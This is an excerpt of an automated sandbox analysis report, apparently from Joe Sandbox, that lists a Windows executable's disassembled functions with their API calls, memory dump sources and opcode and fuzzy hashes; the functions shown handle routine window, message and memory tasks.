                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: &A
                                        • API String ID: 0-640968382
                                        • Opcode ID: 456b9ffa0c907007d79c59e5575a278ccfa93640771f3b16d84059a18a1ad1b1
                                        • Instruction ID: e3960f6c844300372037654337779518db30038930825de93783d1448768a90a
                                        • Opcode Fuzzy Hash: 456b9ffa0c907007d79c59e5575a278ccfa93640771f3b16d84059a18a1ad1b1
                                        • Instruction Fuzzy Hash: B042D575E00219DADF20DFA6D841BEEBBF5EF54308F10406BE415A3281FB785A85CB5A
                                        Function 00403CC0 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,00401BC3,00401BA9,00000001,00000010,OPS,00000000,00000000,00000000), ref: 00403CC6
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: f8f2f79aa34fb376b4ff93ccc1e767401dfd8d2f51a53d49510acf97ab4a8a46
                                        • Instruction ID: d47e0acefe1b07befbc1d549b34453376f7af543b511f3b2cf7c13f8ad3f3650
                                        • Opcode Fuzzy Hash: f8f2f79aa34fb376b4ff93ccc1e767401dfd8d2f51a53d49510acf97ab4a8a46
                                        • Instruction Fuzzy Hash: 51B001B9500308DBDB019FA4EE7CB557BB8F74C785F848669EE01AB260C7789414CB9D
                                        Function 00458AB9 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: =
                                        • API String ID: 0-2322244508
                                        • Opcode ID: b43c0cb6ebff51bcd43314de3eac60bbb8636a68a2350b2612eb937acff3f499
                                        • Instruction ID: 12ca28742db18793fbd873760c6c1f3c4a8c36a766a4e938dab0c427f684426e
                                        • Opcode Fuzzy Hash: b43c0cb6ebff51bcd43314de3eac60bbb8636a68a2350b2612eb937acff3f499
                                        • Instruction Fuzzy Hash: EA516C719051989BDB1ADFA4C8907FE7BA69F55304F08806FEC425B346CF38CA0AC790
                                        Function 00476B26 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: =
                                        • API String ID: 0-2322244508
                                        • Opcode ID: 1e173fa4e2546f1c85787d41b8c1006a380a547f4df810c66ff47e0868e57343
                                        • Instruction ID: 63e3b3a017a833473f7562562c3bc60631c0a01d39b52c8fee5794a5c52904e5
                                        • Opcode Fuzzy Hash: 1e173fa4e2546f1c85787d41b8c1006a380a547f4df810c66ff47e0868e57343
                                        • Instruction Fuzzy Hash: 18517B316041958FCB1ADFA4D8607FE7BA2DF85304F1AC06FE8864B345CB389A0AC785
                                        Function 00458EAF Relevance: .9, Instructions: 882COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e8f3497fc24e1cd944007e57d88c19ca3353d8baffd49f88a051de726f2628f5
                                        • Instruction ID: 3e0795eb92d8dff9949ecb97bd3ceb7c057b185ef35ec5c5bf3f565494d8f3f8
                                        • Opcode Fuzzy Hash: e8f3497fc24e1cd944007e57d88c19ca3353d8baffd49f88a051de726f2628f5
                                        • Instruction Fuzzy Hash: 13629533F046394BDB1CCE9A88E04EDB7A3AAC821470FC27DCD5667756C9B86906C794
                                        Function 00476F1D Relevance: .9, Instructions: 882COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e8f3497fc24e1cd944007e57d88c19ca3353d8baffd49f88a051de726f2628f5
                                        • Instruction ID: 3e0795eb92d8dff9949ecb97bd3ceb7c057b185ef35ec5c5bf3f565494d8f3f8
                                        • Opcode Fuzzy Hash: e8f3497fc24e1cd944007e57d88c19ca3353d8baffd49f88a051de726f2628f5
                                        • Instruction Fuzzy Hash: 13629533F046394BDB1CCE9A88E04EDB7A3AAC821470FC27DCD5667756C9B86906C794
                                        Function 0044FD0D Relevance: .7, Instructions: 687COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fab9ec5693c3c7973fbb4e11270f39259d068c2678b2f4dcfbcff9c439a582c6
                                        • Instruction ID: 748456e88614d7738b97bf786093bfb8eab34445ceffc70da693f56639814664
                                        • Opcode Fuzzy Hash: fab9ec5693c3c7973fbb4e11270f39259d068c2678b2f4dcfbcff9c439a582c6
                                        • Instruction Fuzzy Hash: A642B875D002199BEF10EBA5CC85BEEB7B4EF14315F10005FE905A7282EB789D89CB59
                                        Function 00406C10 Relevance: .6, Instructions: 601COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1d082fc67961cf9c9017bdebd9d0fdabf83cbc1f99fd689fd60a11460bf935a
                                        • Instruction ID: 7102d13b211e639c190c95f68438129d24ba1901ff3681f10da7641a22d18450
                                        • Opcode Fuzzy Hash: a1d082fc67961cf9c9017bdebd9d0fdabf83cbc1f99fd689fd60a11460bf935a
                                        • Instruction Fuzzy Hash: 7A12D3BBA557124BD708CA55CC80295B3E3BBC8364B1F913DD959D3305EEB9BA0B46C0
                                        Function 004573F1 Relevance: .2, Instructions: 191COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e1d98015a32338c6a00b6d769ff57e7c37ca392ba9b638aadb517c32b1555ce8
                                        • Instruction ID: bb7e76779ccd5622a2b89c859f93bd206b9abd56b3e94d3b51046805e64bce7e
                                        • Opcode Fuzzy Hash: e1d98015a32338c6a00b6d769ff57e7c37ca392ba9b638aadb517c32b1555ce8
                                        • Instruction Fuzzy Hash: 04514831A042495BEB08DFA9D491AEE3796CBA5310F14C43EEC15CB287D939C947CB54
                                        Function 0047544D Relevance: .2, Instructions: 191COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 909535e44158d996768af987177f61606b68f270ea5adb28a075fb92116d746e
                                        • Instruction ID: 930dcccb4798f1d9cf40a700622593cf688d7ed903cfe1559e7968c5cd7bc951
                                        • Opcode Fuzzy Hash: 909535e44158d996768af987177f61606b68f270ea5adb28a075fb92116d746e
                                        • Instruction Fuzzy Hash: F9513531B042455FEB18DFAAD8A27EE3797DBD4310F10C42EE819CB286E9798902CF15
                                        Function 00457D75 Relevance: .1, Instructions: 131COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0fe38a771798dd2f8fc17d9a5c336f245a58f38a1fa94597ec8d34af7b2b7f39
                                        • Instruction ID: 7613c8e7aab1933d09eacacd2e8c877676ac71cc1fcfc62aa2a2bd2544e95ee3
                                        • Opcode Fuzzy Hash: 0fe38a771798dd2f8fc17d9a5c336f245a58f38a1fa94597ec8d34af7b2b7f39
                                        • Instruction Fuzzy Hash: AD418E3154F3C18FC743877889691913FB2AE6B26932E45DFC8C19F577D26A080ACB62
                                        Function 004598D3 Relevance: .1, Instructions: 92COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4085d84cf31177a4f54e63345dafba999913b917ede83076b8bb7559e55b031b
                                        • Instruction ID: ab2fa9fc806f892d44c030ba35b704baebff2206fd97f31db8f7c0752b54ab67
                                        • Opcode Fuzzy Hash: 4085d84cf31177a4f54e63345dafba999913b917ede83076b8bb7559e55b031b
                                        • Instruction Fuzzy Hash: 56315C1210A7D49FC72AC76C58A58EAFFE58EA720071DC9CCD8CA5B753C560E908C7A2
                                        Function 00477941 Relevance: .1, Instructions: 92COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e1a1604f8e7e8376107c94d5bab83eb31d0297df03f598431bfbb0360b518c33
                                        • Instruction ID: 5292b430800b5474c8cfe93aaafa41033e31c3c0d59109b02c20be76f09ff95a
                                        • Opcode Fuzzy Hash: e1a1604f8e7e8376107c94d5bab83eb31d0297df03f598431bfbb0360b518c33
                                        • Instruction Fuzzy Hash: F4317C1210E7D49FC72AC76C94A58EAFFE18EA720075DC9CCD4CA6B753C560A508CBA2
                                        Function 0040523F Relevance: 46.8, APIs: 31, Instructions: 333windowkeyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SystemParametersInfoA.USER32(00000026,00000000,?,00000000), ref: 00405290
                                        • GetWindowRect.USER32(?,00000010), ref: 004052B8
                                        • GetWindowRect.USER32(?,00000020), ref: 004052C1
                                        • GetSystemMetrics.USER32(0000003D), ref: 004052D1
                                        • GetSystemMetrics.USER32(0000003E), ref: 004052D8
                                        • GetWindowLongA.USER32(?,000000F0), ref: 004052E2
                                        • GetSystemMetrics.USER32(00000005), ref: 004052F1
                                        • GetWindowLongA.USER32(?,000000EC), ref: 004052FC
                                        • GetSystemMetrics.USER32(0000002D), ref: 0040530A
                                        • GetSystemMetrics.USER32(0000002E), ref: 00405311
                                        • GetSystemMetrics.USER32(00000022), ref: 00405320
                                        • GetSystemMetrics.USER32(00000023), ref: 00405327
                                        • GetSystemMetrics.USER32(0000003B), ref: 0040532E
                                        • GetSystemMetrics.USER32(0000003C), ref: 00405335
                                        • SendMessageA.USER32(?,00000024,00000000,00000034), ref: 0040534A
                                        • GetKeyState.USER32(00000001), ref: 0040534E
                                        • SendMessageA.USER32(?,00000201,00000001,00000000), ref: 00405364
                                        • SetCapture.USER32(?), ref: 00405369
                                        • PostMessageA.USER32(?,00000231,00000000,00000000), ref: 00405379
                                        • GetCursorPos.USER32(-00000008), ref: 0040538F
                                        • LoadImageA.USER32(00000000,00007F86,00000002,00000000,00000000,00008040), ref: 004053A4
                                        • SetCursor.USER32(00000000), ref: 004053AB
                                        • MapWindowPoints.USER32(?,00000000,?,00000001), ref: 004053E7
                                        • SendMessageA.USER32(?,00000214,?,00000010), ref: 0040540A
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: System$Metrics$Window$Message$Send$CursorLongRect$CaptureImageInfoLoadParametersPointsPostState
                                        • String ID:
                                        • API String ID: 985555588-0
                                        • Opcode ID: 63a5c3357b4a5747b66d9db94d4487f7d6bcd7bda56f759a115c6535e61ab02f
                                        • Instruction ID: 205061af9d75e53c44399c3ed0056efb24790ccb844f4c24922cd61c836d760d
                                        • Opcode Fuzzy Hash: 63a5c3357b4a5747b66d9db94d4487f7d6bcd7bda56f759a115c6535e61ab02f
                                        • Instruction Fuzzy Hash: 38C1A071A10A0ABFDB10AF60CD88ABB7B75FB04340F50453BF505A66D0D779A8A1CF99
                                        Function 00404B03 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 238memoryregistryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • sprintf.MSVCRT ref: 00404B46
                                        • memset.MSVCRT ref: 00404B63
                                        • RegisterClassA.USER32(?), ref: 00404BA8
                                        • AdjustWindowRect.USER32(?,00000010,00000000), ref: 00404C01
                                        • GetSystemMetrics.USER32(00000000), ref: 00404C3E
                                        • GetSystemMetrics.USER32(00000001), ref: 00404C58
                                        • GetActiveWindow.USER32 ref: 00404C7F
                                        • GetWindowRect.USER32(?,?), ref: 00404C8E
                                        • CreateWindowExA.USER32(00000000,?,?,00000010,?,?,00000001,?,?,00000000,00000000), ref: 00404CEF
                                        • SetPropA.USER32(00000000,PB_WindowID,00000100), ref: 00404D0C
                                        • ShowWindow.USER32(00000000,00000001), ref: 00404D33
                                        • RtlAllocateHeap.NTDLL(00000000,0000000C), ref: 00404D58
                                        • CreateAcceleratorTableA.USER32(?,?), ref: 00404D95
                                        • UnregisterClassA.USER32(?), ref: 00404DC9
                                          • Part of subcall function 004066BB: memset.MSVCRT ref: 004066D8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Window$ClassCreateMetricsRectSystemmemset$AcceleratorActiveAdjustAllocateHeapPropRegisterShowTableUnregistersprintf
                                        • String ID: PB_WindowID$WindowClass_%d
                                        • API String ID: 1820370190-2937193648
                                        • Opcode ID: 063ace8527f72d1ec566d245578ff32e7f27e017082b94de6c0a8473836dc150
                                        • Instruction ID: 28adbf0df4d083847e84d8171d787dae0ee48a8b621b34b8ec1d13c8ba578f25
                                        • Opcode Fuzzy Hash: 063ace8527f72d1ec566d245578ff32e7f27e017082b94de6c0a8473836dc150
                                        • Instruction Fuzzy Hash: 3CA17AB190020ADFDB10CF69D989B9EBBF4FF44344F14862AF954A32A0D778D950CB99
                                        Function 004036F8 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 106librarystringloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 00403718
                                        • memset.MSVCRT ref: 00403725
                                        • LoadLibraryA.KERNEL32(SHELL32.DLL), ref: 00403732
                                        • strncpy.MSVCRT ref: 00403763
                                        • strlen.MSVCRT ref: 00403772
                                        • GetProcAddress.KERNEL32(?,SHBrowseForFolder), ref: 0040379C
                                        • GetProcAddress.KERNEL32(?,SHGetPathFromIDList), ref: 004037EB
                                        • CoTaskMemFree.COMBASE(?), ref: 00403806
                                        • strlen.MSVCRT ref: 0040380D
                                        • FreeLibrary.KERNEL32(?,00000000), ref: 00403829
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: AddressFreeLibraryProcstrlen$InitializeLoadTaskmemsetstrncpy
                                        • String ID: @$SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                        • API String ID: 1137656791-1801489780
                                        • Opcode ID: d0772f556505189ebe70807fcab58d77b8969dd6fcc445947570fce6bb494dae
                                        • Instruction ID: 3440e14c815a203a1a78cd3407a2a10063d2b49fea99d3606607f3928df854cf
                                        • Opcode Fuzzy Hash: d0772f556505189ebe70807fcab58d77b8969dd6fcc445947570fce6bb494dae
                                        • Instruction Fuzzy Hash: AF419171800208AFDB11EFA5CC45ADE7FB8AF05315F0080BAF554BA292D7B99E14CF59
                                        Function 00404925 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 73memorywindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindow.USER32(00000000,00000004), ref: 0040494B
                                        • SetActiveWindow.USER32(00000000), ref: 0040495C
                                        • RemovePropA.USER32(00000000,PB_WindowID), ref: 00404970
                                        • RemovePropA.USER32(00000000,PB_DropAccept), ref: 00404979
                                        • RevokeDragDrop.OLE32(00000000), ref: 00404982
                                        • SendMessageA.USER32(?,00000221,00000000,00000000), ref: 00404999
                                        • sprintf.MSVCRT ref: 004049B8
                                        • UnregisterClassA.USER32(?), ref: 004049CD
                                        • HeapFree.KERNEL32(00000000,?), ref: 004049E3
                                        • DestroyAcceleratorTable.USER32(?), ref: 004049EC
                                        • DeleteObject.GDI32(?), ref: 004049FA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: PropRemoveWindow$AcceleratorActiveClassDeleteDestroyDragDropFreeHeapMessageObjectRevokeSendTableUnregistersprintf
                                        • String ID: PB_DropAccept$PB_WindowID$WindowClass_%d
                                        • API String ID: 192457453-976223216
                                        • Opcode ID: 884db38a7d1111d9f10292c509c9a9f5fdc1eb4f4251496c9c73458246e950c8
                                        • Instruction ID: 76adc180981eb15cd37713a9aaa1cc34ae54204bacec3ed2c8797916cc70c0fb
                                        • Opcode Fuzzy Hash: 884db38a7d1111d9f10292c509c9a9f5fdc1eb4f4251496c9c73458246e950c8
                                        • Instruction Fuzzy Hash: CC214CB1500305EBDB216F71ED09F5B7BB9EB44740F148439FA41B21A0C736D8659B9D
                                        Function 00404F24 Relevance: 16.6, APIs: 11, Instructions: 121windowmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • HeapFree.KERNEL32(00000000,?), ref: 00404F58
                                        • HeapFree.KERNEL32(00000000,?), ref: 00404F64
                                        • HeapFree.KERNEL32(00000000,?), ref: 00404F90
                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000003), ref: 00404FB8
                                        • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,000000FF,000001FF), ref: 00404FD5
                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000003), ref: 00404FEB
                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404FF7
                                        • GetActiveWindow.USER32 ref: 00404FFD
                                        • TranslateAccelerator.USER32(00000000,00000000,?), ref: 00405015
                                        • TranslateMessage.USER32(?), ref: 00405023
                                        • DispatchMessageA.USER32(?), ref: 0040502D
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
